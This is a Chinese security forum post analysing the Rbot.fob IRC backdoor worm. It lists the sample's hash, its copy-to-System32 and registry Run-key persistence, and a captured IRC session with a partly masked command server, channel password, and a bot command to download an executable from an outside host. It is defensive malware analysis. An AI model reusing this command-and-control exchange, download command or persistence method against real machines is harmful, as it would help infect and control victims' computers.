找回密码
 注册创意安天

Backdoor.Win32.Rbot.fob分析

[复制链接]
发表于 2008-6-5 17:17 | 显示全部楼层 |阅读模式
一、 病毒标签:
病毒名称: Backdoor.Win32.Rbot.fob
病毒类型: 后门
文件 MD5: 45D0455398BD893176EB34C4B319D618
公开范围: 完全公开
危害等级: 4
文件长度: 506,880 字节
感染系统: Windows98以上版本
加壳类型: Themida|WinLicense V1.9.2.0  -> Oreans Technologies [Overlay] *

二、 病毒描述:
该病毒运行后,复制自身到%System32%目录下,添加注册表自动运行项以随机引导病毒体;连接网络下载病毒文件,病毒运行后自我删除,
此病毒为一个利用Windows平台下IRC协议的网络蠕虫,受感染用户可能会被操纵进行Ddos攻击、远程控制、发送垃圾邮件、创建本地Tftp、
下载病毒文件等行为。

三、 原样本行为分析:
本地行为:
复制自身到 %system32% 文件夹下
gwbuahihk.exe
2、新增注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
注册表值: "Winds Sersc Agts"
类型: REG_SZ
值: "zxnyjgzyu.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
注册表值: "Winds Sersc Agts"
类型: REG_SZ
值: "zxnyjgzyu.exe"

网络行为:
              协议:TCP
    连接服务器名:irc.priv****t.com
    域名或IP地址:
    209.250.232.2***:7000
    加入的 IRC 频道名:
    #FAAK#
    用户名:dcxvtfdxls (随机小写字母)
    密码:9400002290
    对目标主机的操作:
    /*昵称*/
    NICK CHN|9400002290
    /*欢迎信息*/
    :irc.priv****.com NOTICE AUTH
    :*** Looking up your hostname...
    :irc.priv****.com NOTICE AUTH
    :*** Couldn't resolve your hostname
    :using your IP address instead
    :irc.priv****.com 001 CHN|9400002290
    :irc.priv****.com 002 CHN|9400002290
    : M0dded by uNkn0wn Crew
    :irc.priv****.com 003 CHN|9400002290
    :irc.priv****.com 004 CHN|9400002290
    :www.uNkn0wn.eu - iD@uNkn0wn.eu
    :irc.priv****.com 005 CHN|9400002290
    :irc.priv****.com 005 CHN|9400002290
    :irc.priv****.com 005 CHN|9400002290
    /*设置用户属性与加入房间及返回相关信息*/
    :irc.priv****.com 422 CHN|9400002290
    :MOTD File is missing
    :CHN|9400002290 MODE CHN|9400002290 :+iwG
    :irc.priv****.com 302
    MODE CHN|9400002290 -x+i
    JOIN #FAAK# saad.
    USERHOST CHN|9400002290
    MODE CHN|9400002290 -x+i
    JOIN #FAAK# saad.
    USERHOST CHN|9400002290
    MODE CHN|9400002290 -x+i
    JOIN #FAAK# saad.
    USERHOST CHN|9400002290
    MODE CHN|9400002290 -x+i
    JOIN #FAAK# saad.
    :CHN|9400002290!dcxvtfdxls@219.147.182.*** JOIN :#FAAK#
    :irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
    :irc.priv****t.com 302 CHN|9400002290     :CHN|9400002290=+dcxvtfdxls@219.147.182.***
    :irc.priv****.com 302 CHN|9400002290     :CHN|9400002290=+dcxvtfdxls@219.147.182.***
    :irc.priv****.com 302 CHN|9400002290     :CHN|9400002290=+dcxvtfdxls@219.147.182.***
    /*加入房间#kok6*/
    JOIN #FAAK# saad.
    /*用户信息显示*/
    USERHOST CHN|9400002290
    :irc.priv****.com 302 CHN|9400002290     :CHN|9400002290=+dcxvtfdxls@219.147.182.***
    /*连接网络下载病毒*/
    :irc.priv****.com 332 CHN|9400002290 #FAAK# :.jp]de100     http://members.ly***.co.uk/abosal7/usb.exe sty.exe
    :irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
    /*服务器发送连接响应*/
    PING :irc.priv****.com
    /*回应服务器*/
    PONG :irc.priv****.com
    /*加入房间*/
    JOIN #FAAK# saad.
    
2、连接网络下载病毒文件:
    协议:TCP
    域名或IP地址:http://members.l****.co.uk (213.193.4.**)
    端口:80
    对目标主机的操作:下载病毒文件
    http://members.ly****.co.uk/abosal7/usb.exe 注1:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,
windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%  = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
    %Windir%\      WINDODWS所在目录
%DriveLetter%\   逻辑驱动器根目录
%ProgramFiles%\   系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
注2:与IRC服务器的交互信息中,符号“/**/”内的数据是分析员对下一行或几行的注释信息,非为与服务器的交互信息内容。
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

Archiver|手机版|小黑屋|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-12-22 20:56

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表